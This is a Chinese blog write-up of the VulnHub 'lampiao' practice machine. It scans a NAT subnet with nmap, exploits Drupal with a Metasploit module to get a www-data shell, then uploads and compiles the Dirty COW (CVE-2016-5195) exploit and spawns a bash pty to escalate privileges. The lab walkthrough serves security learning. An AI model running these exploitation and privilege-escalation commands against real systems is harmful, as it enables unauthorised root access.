首页 > 系统相关 >vulnhub-lampiao(linux脏牛提权)

vulnhub-lampiao(linux脏牛提权)

时间:2024-01-15 15:46:21浏览次数:31  
标签:lampiao 192.168 提权 脏牛 dcow cpp nmap

环境准备

  1. 靶机-lampiao
  2. 攻击机-kali

演示

使用nmap探测内网网络,我这里使用NAT网络,网段为192.168.116.0/24

nmap 192.168.116.0/24

发现192.168.116.136存活,扫描全端口

nmap -p 1-65535 192.168.116.136

 访问1898端口发现为drupal

使用msf来进行攻击

search drupal

 

 这里使用模块1,use 1,配置参数

 权限为www-data权限,上传提权脚本

https://github.com/gbonacini/CVE-2016-5195

 上传命令

upload /root/cve-2016-5195/dcow.cpp /tmp/dcow.cpp

编译脚本

g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow dcow.cpp -lutil

之后切换到bash shell下执行

python -c 'import pty; pty.spawn("/bin/bash")'

 

标签:lampiao,192.168,提权,脏牛,dcow,cpp,nmap
From: https://www.cnblogs.com/re8sd/p/17965497

相关文章

  • 【Powershell】域用户提权
    适合人群:适合对Powershell和域有一定基础和感兴趣的运维。课程目标:利用Powershell和计划任务让普通用户能用管理员权限执行程序或脚本课程简介:以往都需要借助收费第三方软件来完成的事情,现在可以通过强大的Powershell完成。利用Powershell和计划任务让普通用户能用管理员权限执行......
  • Stable Diffusion(SD-Webui)tag快速提权(降权)
    StableDiffusion(SD-Webui)tag的快速提权|降权:很简单:  1.选中tag(只要光标在你分词里面就行)  2.CRTRL+上下方向键(向上默认提0.1,向下默认减.0.1,当权为1时候会帮你自动消掉括号)完事请注意:中文逗号默认会被视为tag一部分!判断中英文逗号最简单的办法是看有没有贴贴,俩遍都......
  • windows提权
    WindowsPrivilegeEscalation提权前先基本信息收集:系统版本、漏洞补丁、杀软防护、当前权限、系统配置、系统的服务等查看系统进程:tasklist/svc(杀软防护软件检查)系统漏洞提权思路:查看系统补丁信息,若有系统内核漏洞,但没打补丁就可以尝试找exp查找补丁情况#看windows版本v......
  • Windows提权3
    本次学习通过msf提权当我们进行渗透时,已经成功上传了木马并返回了shell,这个时候为了后续渗透需要对目标机器进行提权当前用户为admin,我们想要提权到system最高权限当目标是Windowsserver2003,管理员用户运行木马时,直接使用getsystem提权  切换到普通用户运行木马,则无法直......
  • Windows提权2
    本次学习Windows信任服务路径漏洞,劫持服务启动来进行提权实验原理Windows服务运行时,如果服务路径和快捷方式路径具有一个或多个空格并且没有用引号括起来,Windows会对每一个空格尝试寻找名字与空格前的名字相匹配的程序执行,这样会很容易受到路径拦载,然后造成TrustedServiceP......
  • windows提权1
    本次学习利用Windows环境变量配置错误进行提权实验原理系统在执行用户命令时,若用户未给出绝对路径,则首先在当前目录下寻找相应的可执行文件、批处理文件等。若找不到,再依次在PATH保存的这些路径中寻找相应的可执行程序文件(windows环境变量的查找顺序是按照文件的录入顺序从前往......
  • Linux提权5
    本次学习Linuxsudo提权实验原理sudo是Linux系统管理指令,是允许系统管理员让普通用户执行一些或者全部的root命令的一个工具。换句话说通过此命令可以让非root的用户运行只有root才有权限执行的命令。sudo使一般用户不需要知道超级用户的密码即可获得权限。首先超级用户将普通......
  • Linux提权3
    本次学习Linux计划任务提权实验原理 实验过程首先攻击机登录普通用户 查看计划任务情况可以看到cleanup.py脚本每一分钟执行一次脚本文件位置/home/cleanup/1.sh查看脚本权限,任意用户都有读写和执行权限这个时候想办法修改脚本文件内容,通过脚本的定时任务执行恶意操......
  • Linux提权2
    本次学习Linux内核漏洞提权实验原理  实验过程已获取目标服务器普通用户mark/123456账户密码kali先远程登陆mark  查看目标服务器系统版本   确定目标服务器内核版本和系统版本后,通过kali下的searchploit来搜索相关EXP 可以确定使用的EXP为linux/local/442......
  • linux提权
    LinuxPrivilegeEscalation机器信息收集拿到一个立足点可以执行简单命令后,对机器的一些信息收集hostname:主机名在某些情况下,它可以提供有关目标系统在企业网络中的角色的信息(例如用于生产SQL服务器的SQL-PROD-01)uname-a:linux内核版本等信息,对提权有用提供有关内核版本......